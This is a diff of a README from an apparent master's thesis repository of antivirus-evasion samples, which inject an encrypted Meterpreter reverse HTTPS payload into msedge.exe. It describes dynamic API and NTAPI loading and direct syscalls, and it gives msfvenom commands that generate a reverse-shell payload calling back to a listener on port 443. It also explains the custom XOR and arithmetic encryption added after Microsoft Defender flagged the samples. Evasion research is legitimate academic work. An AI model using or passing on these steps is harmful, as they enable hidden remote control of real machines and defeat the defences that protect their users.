bayoub03/Master-Thesis-Implementation/README.md

 ## Evasion Techniques

-The samples, available on the directory `samples/` included in this repository use several evasion techniques:
+The samples, located in the `samples/` directory of this repository, use several evasion techniques:

-- **Obfuscation:** A stageless Meterpreter x64 reverse HTTPS payload that uses both the x64/xor encoding from msfvenom and a custom basic XOR encryption.
+- **Obfuscation:** This involves a stageless Meterpreter x64 reverse HTTPS payload that uses both the x64/xor encoding from msfvenom and a custom basic XOR encryption.
 This technique is implemented in all the samples.
-- **Shellcode Injection:** an injection of the Meterpreter payload is performed into **msedge.exe**, this could fool security solutions since Microsoft Edge regularly perform HTTPS requests, therefore the Meterpreter traffic will be hidden with the regular Ms Edge traffic.
+- **Shellcode Injection:** The Meterpreter payload is injected into **msedge.exe**.
+This could deceive security solutions since Microsoft Edge frequently performs HTTPS requests, thereby hidding the Meterpreter traffic within the regular Microsoft Edge traffic.
 This is implemented in all the samples.
-- **Basic API calls:** This is not an evasion techniques however, the sample implemeting this will serve as a baseline for other sample.
-This is implemented in the sample `Shellcode_injection`.
+- **Basic API calls:** Although this is not an evasion technique, the sample implementing this serves as a baseline for other samples.
+It is implemented in the `Shellcode_injection/` directory.
-- **Dynamic API Loading:** This is a basic method used to hide the APIs from the Import Address Table.
-This will resolve the APIs by loading them dynamically.
+- **Dynamic API Loading:** This technique conceals the APIs from the Import Address Table by dynamically loading the APIs.
 This is implemented in the sample `Shellcode_injection_dynamic_lib`.
-- **NTAPIs:** This is a more advances techcniques where we load the NTAPIs instead of the classical APIs dynamically.
-This could potentially bypass security solutions that does not hook the `ntdll.dll`.
-This is implemented in the sample `Shellcode_injection_NTAPIs`.
+- **Dynamic NTAPIs Loading:** This is a more advance technique which involves dynamically loading NTAPIs instead of the classical APIs, potentially evading security solutions that do not hook the `ntdll.dll`.
+This is implemented in the `Shellcode_injection_NTAPIs` directory.
-- **Evasion of API Hooks by Direct Syscalls:** This tehcniqeus is used to bypass the API hooking of classical APIs and NTAPIs by using a Direct Syscalls technique.
-This is implemented in the sample `Shellcode_injection_syscalls` and `Shellcode_injection_syscalls_mingw_vsc` for a version compatible with MinGW.
+- **Evasion of API Hooks by Direct Syscalls:** This technique is used to bypass the API hooking of classical APIs and NTAPIs through Direct Syscalls.
+This is implemented in the sample `Shellcode_injection_syscalls`, compatible with Visual Studio, `Shellcode_injection_syscalls_mingw`, compatible with MinGW and `Shellcode_injection_syscalls_mingw_vsc` for a version compatible with both Visual Studio and MinGW.

-These techniques have been integrated by the author within the AVET framework available on this repo.
-For syscall generation, the tool **SysWhispers3** is used, available at: [SysWhispers3 on GitHub](https://github.com/klezVirus/SysWhispers3).
-However since AVET uses the MinGW compilator, we also used another version of Syswhispers called **Syswhispers2**
+These techniques have been integrated by the author within the AVET framework available on this repository.
+For syscall generation, the tool **SysWhispers3** is used for the `Shellcode_injection_syscalls` and `Shellcode_injection_syscalls_mingw` samples.
+Whereas for the `Shellcode_injection_syscalls_mingw_vsc` sample, **Syswhispers2** is used.
+These tools are availble at: [SysWhispers3 on GitHub](https://github.com/klezVirus/SysWhispers3) and [SysWhispers2 on GitHub](https://github.com/jthuraisamy/SysWhispers2).

 ## Modification of the payload

-The payload used is stageless Meterpreter x64 reverse HTTPS payload that employs a basic XOR encryption is used.
-This has to be replaced if you want to use your payload with the right IP address.
+The payload employed is a stageless Meterpreter x64 reverse HTTPS payload, using the x64/xor encoder from msfvenom.
+Additionally, an extra layer of encryption has been implemented, which is further detailed in the [in the section _Utils_](#utils).

+**Note**: To use the samples with your own IP address, the payload must be replaced.

 ## Utils

-We added some custom encryptions which has also be integrated within AVET, indeed its default encryption routines have already be used and are therefore well-known by AV vendors.
-This custom encryptions as well as the decryption routine could then be used to not be flag by AVET's ecnryption methods.
+We have introduced custom encryption techniques that have been integrated into AVET.
+Its default encryption routines are well-known to antivirus (AV) vendors and have been widely used.
+These custom encryption methods, along with their corresponding decryption routines, are designed to avoid detection by AVET's standard encryption methods.

+**Important Remark**: Our custom XOR encryption is detectable by Microsoft Defender when implemented with AVET.
+As a result, we have added a basic arithmetic encryption to circumvent static detection [as described in section _Custom obfucation of Meterpreter payloads_](#custom-obfucation-of-meterpreter-payloads).

 ### XORing Meterpreter payloads

-For xoring the payload we used the code available on `XOR_encryptor`.
+For XORing the payload we used the code available on `XOR_encryptor`.

-To do so:
+Follow these steps:

-- Generate your payload using **msfvenom** : `msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.173.130 lport=443 -f c > payload.h`
+- Generate your payload with **msfvenom** : `msfvenom -p windows/x64/meterpreter_reverse_https lhost=eth0 lport=443 -e x64/xor -f c > payload.h`
-- Take the file newly generated and give it as input to the executable `XOR_encryptor.exe`, this can be used with the following command : `.\XOR_encryptor.exe payload.h <output_file_name>` for example in our case the output filename is `buffer.h `
+- Use the newly generated file as input for the `XOR_encryptor.exe` executable with the following command: `\XOR_encryptor.exe payload.h <output_file_name>`.
+For example, in our case, the output filename is `buffer.h `
-- Add the newly generated file into Visual Studio.
-Then include the file into the sample of your choice.
+- Import the newly created file into Visual Studio and include it in your chosen sample.
-You should be ready to go !

-In a kali machine, ensure you have `wine` installed, then you have to simply execute the command with `wine` as a prefix and you should have your XORed payload generated.
+On a Kali machine, ensure `wine` is installed.
+You can then execute the command with `wine` as a prefix to generate your XORed payload.

 ### Custom obfucation of Meterpreter payloads

-We added another technique to obfuscate the payload.
-Indeed, when integrating the custom previous XOR encryption routing inside AVET, we found that it got detected by Microsoft Defender as `Trojan:Win64/CryptInject.VZ!MTB`.
-Indeed, this could be explained since the sample generated contains already the code of AVET if we added on top of it a XOR encryption that performs
+We introduced an additional technique to obfuscate the payload.
+Indeed, upon integrating our custom XOR encryption routine into AVET, we discovered that Microsoft Defender detected it as `Trojan:Win64/CryptInject.VZ!MTB`.
+This detection likely occurred because the sample already contained AVET code, and the XOR encryption was added on top of it which could lead to suspicious code by AV vendors.

-For xoring the payload we used the code available on `XOR_encryptor`.

-To do so:
-- Generate your payload using **msfvenom** : `msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.173.130 lport=443 -f c > payload.h`
-- Take the file newly generated and give it as input to the executable `XOR_encryptor.exe`, this can be used with the following command : `.\XOR_encryptor.exe payload.h <output_file_name>` for example in our case the output filename is `buffer.h `
-- Add the newly generated file into Visual Studio.
-Then include the file into the sample of your choice.
-You should be ready to go !

-In a kali machine, ensure you have `wine` installed, then you have to simply execute the command with `wine` as a prefix and you should have your XORed payload generated.
+To apply this technique, follow the steps outlined in [in the section _XORing Meterpreter payloads_](#xoring-meterpreter-payloads), but use `custom_encryptor` instead of `XOR_encryptor`.

 ### For generating direct syscalls using Syswhisper3